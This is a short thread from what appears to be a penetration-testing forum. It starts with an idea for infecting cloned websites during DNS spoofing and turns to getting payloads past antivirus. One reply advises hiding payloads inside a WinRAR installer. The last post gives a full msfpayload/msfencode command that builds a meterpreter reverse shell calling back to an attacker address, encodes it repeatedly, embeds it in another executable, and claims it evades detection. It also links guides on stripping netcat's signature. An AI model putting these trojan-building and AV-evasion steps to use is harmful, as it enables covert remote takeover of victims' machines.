Results 1 to 6 of 6

Thread: DNS Spoof

  1. #1
    Member
    Join Date
    Jun 2008
    Posts
    50

    Default DNS Spoof

    Had a play with different scrips and thought of a possible enhancement (I dont have the skills to do this but thought I woudl share the idea)

    SET and other MITM scripts generally rely on a victim going to a cloned website for a payload to be executed, how about the attacker webserver hosting a number of cloned sites, say if it could handle 1000's then the whole web from the victims point of view could be effected...

    Alternativley could the webserver create cloned and infected sites on the fly, i.e. victim requests backtrack.org so the webserver constructs the site and infects with a payload?

    Just a thought, if crap feel free to delete thread...

    (PS dont bother coming back saying, yeah great idea looking forward to seeing the script, I have clearly stated this is an idea and that I do not have the skills)

    (PPS still struggling to get payloads past AV, read various posts and links but still struggling, latest was to encode but how would I go about writing one of these?)

  2. #2
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: DNS Spoof

    (PPS still struggling to get payloads past AV, read various posts and links but still struggling, latest was to encode but how would I go about writing one of these?)
    Just inject payloads into another exe file with a big enough .text segment. For example the winrar installer should work
    And first start with a bind shell or something small before trying meterpreter.
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

  3. #3
    Member
    Join Date
    Jun 2008
    Posts
    50

    Default Re: DNS Spoof

    Had a quick play around with WINRAR and can create a sfx.exe, which seeems to extract to a folder (wouldn't this then trigger the AV?) and runs the program (I was testing with wzcook.exe which our work AV doesnt pick up as a virus but intend to try at home later with a Nirsoft WKV or a msf reverse binder).

    Is this what you mean by "inject"? I though I towuld be trying to combine say netstat.exe and wzcook.exe into 1 exe, but this doesn't seem to be the case with WINRAR?

  4. #4
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  5. #5
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  6. #6
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: DNS Spoof

    msfpayload has the option to put a payload inside another exe file. That's what i ment with injecting.

    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -c 10 -t exe -x someexe.exe -o output.exe
    This worked for me with the winrar exe and doesn't get detected by AV.
    If you want to get netcat passed the AV, you will need to remove the filesignature.

    http://www.mattszafran.co.uk/papers/...atsFileSig.pdf
    http://dl.packetstormsecurity.net/pa...ack_Netcat.pdf

    And I remember there's a video on the site of offensive security "I piss on your AV". You could watch that also.
    http://www.offensive-security.com/resources/videos/
    Last edited by LHYX1; 04-11-2011 at 05:40 PM.
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

Similar Threads

  1. Replies: 5
    Last Post: 04-03-2011, 01:54 PM
  2. DNS Spoof With Ettercap :)
    By killer-souls in forum BackTrack Videos
    Replies: 0
    Last Post: 12-20-2010, 02:24 PM
  3. Can you ARP spoof to much?
    By imported_vvpalin in forum OLD Newbie Area
    Replies: 1
    Last Post: 05-13-2009, 03:34 PM
  4. ap spoof
    By 7ELEVEN in forum OLD Wireless
    Replies: 4
    Last Post: 11-26-2008, 03:22 AM
  5. Spoof Domain
    By DeadWolf in forum OLD Pentesting
    Replies: 4
    Last Post: 10-24-2008, 07:44 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •